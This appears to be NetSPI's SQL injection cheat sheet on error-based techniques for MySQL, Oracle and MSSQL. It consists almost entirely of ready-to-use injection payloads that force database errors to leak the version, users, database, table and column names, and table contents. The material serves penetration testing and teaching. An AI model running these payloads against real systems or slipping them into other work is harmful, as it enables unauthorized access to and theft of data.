Error Based

Error based injections are exploited through triggering errors in the database when invalid inputs are passed to it. The error messages can be used to return the full query results, or gain information on how to restructure the query for further exploitation.

Description Query
XML Parse Error SELECT extractvalue(rand(),concat(0x3a,(select version())))
Double Query SELECT 1 AND(SELECT 1 FROM(SELECT COUNT(*),concat(0x3a,(SELECT username FROM USERS LIMIT 0,1),FLOOR(rand(0)*2))x FROM information_schema.TABLES GROUP BY x)a)

Increment Limit 0,1 to Limit 1,1 to begin cycling through data
Get Current Database SELECT a()

Error Based

Error based injections are exploited through triggering errors in the database when invalid inputs are passed to it. The error messages can be used to return the full query results, or gain information on how to restructure the query for further exploitation.

Description Query
Invalid HTTP Request SELECT utl_inaddr.get_host_name((select banner from v$version where rownum=1)) FROM dual
CTXSYS.DRITHSX.SN SELECT CTXSYS.DRITHSX.SN(user,(select banner from v$version where rownum=1)) FROM dual
Invalid XPath SELECT ordsys.ord_dicom.getmappingxpath((select banner from v$version where rownum=1),user,user) FROM dual
Invalid XML SELECT to_char(dbms_xmlgen.getxml('select "'||(select user from sys.dual)||'" FROM sys.dual')) FROM dual
Invalid XML SELECT rtrim(extract(xmlagg(xmlelement("s", username || ',')),'/s').getstringval(),',') FROM all_users

Error Based

Error based injections are exploited through triggering errors in the database when invalid inputs are passed to it. The error messages can be used to return the full query results, or gain information on how to restructure the query for further exploitation.

Description Query
Explicit conversion SELECT convert(int,(SELECT @@version))
SELECT cast((SELECT @@version) as int)
Implicit conversion SELECT 1/@@version

MSSQL CAST Function Examples

Any of the below queries can be rewritten using the convert function or as an implicit conversion.

Description Query
Inject a CAST function into the current query SELECT CAST(@@version as int)
Show System User SELECT CAST(SYSTEM_USER as int);
Show all databases in a single line with xml path SELECT CAST((SELECT name,',' FROM master..sysdatabases FOR XML path('')) as int)
SELECT CAST((SELECT name AS "data()" FROM master..sysdatabases FOR xml path('')) AS int);
Show Server Name SELECT CAST(@@SERVERNAME as int);
Show Service Name SELECT CAST(@@SERVICENAME as int);
Show List of Databases
Note: The query below must be executed in one line.
DECLARE @listStr VARCHAR(MAX);DECLARE @myoutput VARCHAR(MAX);SET @listStr = '';
SELECT @listStr = @listStr + Name + ',' FROM master..sysdatabases;
SELECT @myoutput = SUBSTRING(@listStr , 1, LEN(@listStr)-1);SELECT CAST(@myoutput as int);
Show List of Tables
Note: The query below must be executed in one line.
DECLARE @listStr VARCHAR(MAX);DECLARE @myoutput VARCHAR(MAX);
SET @listStr = '';SELECT @listStr = @listStr + Name + ',' FROM MYDATABASE..sysobjects WHERE type = 'U';
SELECT @myoutput = SUBSTRING(@listStr , 1, LEN(@listStr)-1);SELECT CAST(@myoutput as int);
Show List of Columns
Note: The query below must be executed in one line.
DECLARE @listStr VARCHAR(MAX);DECLARE @myoutput VARCHAR(MAX);SET @listStr = '';
SELECT @listStr = @listStr + Name + ',' FROM MYDATABASE..syscolumns WHERE id=object_id('MYTABLE');
SELECT @myoutput = SUBSTRING(@listStr , 1, LEN(@listStr)-1);select cast(@myoutput as int);
Show COLUMN Data
Note: The query below must be executed in one line.
Replace MYCOLUMN with * to select all columns
DECLARE @listStr VARCHAR(MAX);
DECLARE @myoutput VARCHAR(MAX);
SET @listStr = '';
SELECT @listStr = @listStr + MYCOLUMN + ',' FROM MYDATABASE..MYTABLE;
SELECT @myoutput = SUBSTRING(@listStr , 1, LEN(@listStr)-1)
SELECT CAST(@myoutput as int);
Show database name one at a time
Note: Increment the inner top value to get the next record
SELECT TOP 1 CAST(name as int)
FROM sysdatabases
WHERE name in (SELECT TOP 2 name FROM sysdatabases ORDER BY name ASC)
ORDER BY name DESC

© 2018 Copyright by NetSPI. All rights reserved.